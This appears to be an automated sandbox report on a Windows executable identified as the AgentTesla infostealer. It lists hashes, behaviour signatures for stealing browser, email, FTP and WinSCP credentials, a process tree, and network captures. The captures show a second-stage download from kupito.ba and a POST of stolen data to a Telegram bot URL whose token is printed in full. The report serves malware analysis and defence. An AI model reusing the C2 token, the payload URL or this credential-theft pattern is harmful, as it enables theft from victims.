Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/12/2024, 01:03 UTC

General

  • Target

    243424396-041942-sanlccjavap0003-2745.exe

  • Size

    485KB

  • MD5

    570f75822327ab67501bcf60b5a5015d

  • SHA1

    f8247519442122f8b727910ae977a3072b9e706e

  • SHA256

    3e60205f7f9428199cf532ac669704b7c0b4112f35aa8061d6efc941948e9e35

  • SHA512

    e2aa892438630c43d1fb07d5cf1ecc5781d6a8079385d4095eaa83aba9a5234a78111d396b91499b405adde712c4b6fb6be9db9dc7aaa16d6f5dcc64f3cea912

  • SSDEEP

    6144:aasRfC5mAhrNngWKklCnLUP4igs2fr0hQtP9pDpmIblrsXU/4pd6nscwcT4UyO:erAvguoLUNUrfB99sGlrEpsncM

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Agenttesla family
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim host in order to infer its geographical location.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe
    "C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe
      "C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4792

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.kupito.ba
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    www.kupito.ba
    IN A
    Response
    www.kupito.ba
    IN CNAME
    kupito.ba
    kupito.ba
    IN A
    51.77.82.235
  • flag-de
    GET
    http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    51.77.82.235:80
    Request
    GET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.kupito.ba
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Sat, 21 Dec 2024 01:04:22 GMT
    server: LiteSpeed
    location: https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
  • flag-de
    GET
    https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    51.77.82.235:443
    Request
    GET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: www.kupito.ba
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/octet-stream
    last-modified: Fri, 20 Dec 2024 02:47:29 GMT
    accept-ranges: bytes
    content-length: 240192
    date: Sat, 21 Dec 2024 01:04:23 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    DNS
    r11.o.lencr.org
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    2.22.144.142
    a1887.dscq.akamai.net
    IN A
    2.22.144.149
  • flag-us
    DNS
    235.82.77.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    235.82.77.51.in-addr.arpa
    IN PTR
    Response
    235.82.77.51.in-addr.arpa
    IN PTR
    cp2webhostba
  • flag-us
    DNS
    61.45.26.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.45.26.184.in-addr.arpa
    IN PTR
    Response
    61.45.26.184.in-addr.arpa
    IN PTR
    a184-26-45-61.deploy.static.akamaitechnologies.com
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    2.22.144.142:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "F907D0DD14501EA8C86F39FC668D0089C52E8B8E21CFB32A4B54EB87B0071FB6"
    Last-Modified: Fri, 20 Dec 2024 23:15:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=21557
    Expires: Sat, 21 Dec 2024 07:03:40 GMT
    Date: Sat, 21 Dec 2024 01:04:23 GMT
    Connection: keep-alive
  • flag-us
    DNS
    142.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    142.144.22.2.in-addr.arpa
    IN PTR
    Response
    142.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-142.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    86.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    POST
    https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dd215b6f2248ce
    Host: api.telegram.org
    Content-Length: 1365
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sat, 21 Dec 2024 01:04:36 GMT
    Content-Type: application/json
    Content-Length: 640
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • 51.77.82.235:80
    http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    http
    243424396-041942-sanlccjavap0003-2745.exe
    692 B
    1.2kB
    11
    4

    HTTP Request

    GET http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin

    HTTP Response

    301
  • 51.77.82.235:443
    https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    tls, http
    243424396-041942-sanlccjavap0003-2745.exe
    11.6kB
    286.7kB
    218
    213

    HTTP Request

    GET https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin

    HTTP Response

    200
  • 2.22.144.142:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D
    http
    243424396-041942-sanlccjavap0003-2745.exe
    518 B
    1.1kB
    6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
    tls, http
    243424396-041942-sanlccjavap0003-2745.exe
    2.6kB
    7.4kB
    13
    13

    HTTP Request

    POST https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    www.kupito.ba
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    59 B
    89 B
    1
    1

    DNS Request

    www.kupito.ba

    DNS Response

    51.77.82.235

  • 8.8.8.8:53
    r11.o.lencr.org
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    61 B
    160 B
    1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    2.22.144.142
    2.22.144.149

  • 8.8.8.8:53
    235.82.77.51.in-addr.arpa
    dns
    71 B
    99 B
    1
    1

    DNS Request

    235.82.77.51.in-addr.arpa

  • 8.8.8.8:53
    61.45.26.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    61.45.26.184.in-addr.arpa

  • 8.8.8.8:53
    142.144.22.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    142.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    86.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    86.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nszB7B9.tmp\System.dll

    Filesize

    11KB

    MD5

    cf85183b87314359488b850f9e97a698

    SHA1

    6b6c790037eec7ebea4d05590359cb4473f19aea

    SHA256

    3b6a5cb2a3c091814fce297c04fb677f72732fb21615102c62a195fdc2e7dfac

    SHA512

    fe484b3fc89aeed3a6b71b90b90ea11a787697e56be3077154b6ddc2646850f6c38589ed422ff792e391638a80a778d33f22e891e76b5d65896c6fb4696a2c3b

  • memory/4036-14-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4036-15-0x0000000010004000-0x0000000010005000-memory.dmp

    Filesize

    4KB

  • memory/4792-16-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-17-0x00000000779E8000-0x00000000779E9000-memory.dmp

    Filesize

    4KB

  • memory/4792-18-0x0000000077A05000-0x0000000077A06000-memory.dmp

    Filesize

    4KB

  • memory/4792-25-0x0000000000450000-0x00000000016A4000-memory.dmp

    Filesize

    18.3MB

  • memory/4792-28-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-27-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-29-0x000000007285E000-0x000000007285F000-memory.dmp

    Filesize

    4KB

  • memory/4792-26-0x0000000000450000-0x00000000016A4000-memory.dmp

    Filesize

    18.3MB

  • memory/4792-30-0x0000000000450000-0x0000000000490000-memory.dmp

    Filesize

    256KB

  • memory/4792-31-0x0000000038B50000-0x00000000390F4000-memory.dmp

    Filesize

    5.6MB

  • memory/4792-32-0x00000000364D0000-0x0000000036536000-memory.dmp

    Filesize

    408KB

  • memory/4792-33-0x0000000072850000-0x0000000073000000-memory.dmp

    Filesize

    7.7MB

  • memory/4792-34-0x00000000394A0000-0x00000000394F0000-memory.dmp

    Filesize

    320KB

  • memory/4792-35-0x00000000394F0000-0x000000003958C000-memory.dmp

    Filesize

    624KB

  • memory/4792-37-0x0000000039950000-0x00000000399E2000-memory.dmp

    Filesize

    584KB

  • memory/4792-38-0x0000000039A30000-0x0000000039A3A000-memory.dmp

    Filesize

    40KB

  • memory/4792-39-0x000000007285E000-0x000000007285F000-memory.dmp

    Filesize

    4KB

  • memory/4792-40-0x0000000072850000-0x0000000073000000-memory.dmp

    Filesize

    7.7MB
